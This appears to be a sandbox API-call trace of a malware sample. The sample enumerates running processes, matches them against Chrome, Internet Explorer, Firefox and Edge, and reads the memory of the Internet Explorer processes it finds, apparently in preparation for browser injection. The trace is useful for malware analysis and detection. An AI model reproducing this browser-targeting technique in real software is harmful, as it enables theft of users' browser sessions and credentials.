	[0213.529] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0213.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.529] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.530] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0213.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x40c4
	[0213.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.530] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0213.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.531] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.531] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0213.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.531] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.532] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0213.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x40c8
	[0213.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.532] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0213.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.533] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.533] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0213.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.534] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.534] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0213.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x40cc
	[0213.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.535] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0213.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.535] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.535] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0213.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.536] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.536] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0213.537] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x40d0
	[0213.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.537] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0213.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.537] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.537] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0213.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.538] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.538] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0213.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x40d4
	[0213.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.538] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0213.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.539] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.539] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0213.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.539] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.540] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0213.540] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0213.540] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0213.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x40d8
	[0213.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.541] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0213.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.542] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.542] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0213.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.543] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.543] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0213.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x40dc
	[0213.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.544] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0213.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.544] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.545] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0213.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.545] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.545] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0213.546] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x40e0
	[0213.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.546] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0213.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.546] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.546] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0213.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.547] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.547] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0213.548] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x40e4
	[0213.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.548] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0213.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.548] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.548] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0213.549] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.549] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0213.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x40e8
	[0213.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.550] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0213.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.551] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.551] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0213.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.552] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.552] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0213.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x40ec
	[0213.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.553] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0213.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.553] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.553] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0213.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.554] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.554] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0213.554] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x40f0
	[0213.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.554] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0213.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.555] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.555] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0213.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.556] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.556] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0213.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x40f4
	[0213.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.557] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0213.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.557] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.558] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0213.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.558] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.558] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0213.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x40f8
	[0213.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.559] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0213.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.560] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.560] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0213.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.560] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.560] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0213.561] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x40fc
	[0213.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.561] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0213.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.561] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.562] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0213.562] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.562] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.562] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0213.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4100
	[0213.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.563] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0213.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.563] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.564] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0213.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.564] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.564] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0213.566] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4104
	[0213.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.566] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0213.566] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.566] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.567] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.567] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0213.568] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.568] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.568] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0213.569] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4108
	[0213.569] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.569] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0213.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.570] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.570] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0213.570] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.570] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.571] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0213.571] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x410c
	[0213.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.572] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0213.572] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.572] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.573] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0213.573] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.573] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.574] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0213.575] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4110
	[0213.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.575] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0213.575] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.575] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0213.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.576] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0213.576] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.576] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.576] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0213.577] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4114
	[0213.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.577] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0213.577] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.578] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0213.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.578] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0213.578] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.578] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.578] NtQueryInformationProcess (in: ProcessHandle=0x4114, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0213.578] ReadProcessMemory (in: hProcess=0x4114, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0213.578] ReadProcessMemory (in: hProcess=0x4114, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0213.579] ReadProcessMemory (in: hProcess=0x4114, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0213.579] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0213.579] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0213.579] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4118
	[0213.579] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.580] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0213.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.580] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0213.580] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.580] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0213.581] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0213.581] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0213.581] NtQueryInformationProcess (in: ProcessHandle=0x4118, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0213.581] ReadProcessMemory (in: hProcess=0x4118, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0213.581] ReadProcessMemory (in: hProcess=0x4118, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0213.581] ReadProcessMemory (in: hProcess=0x4118, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0213.581] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
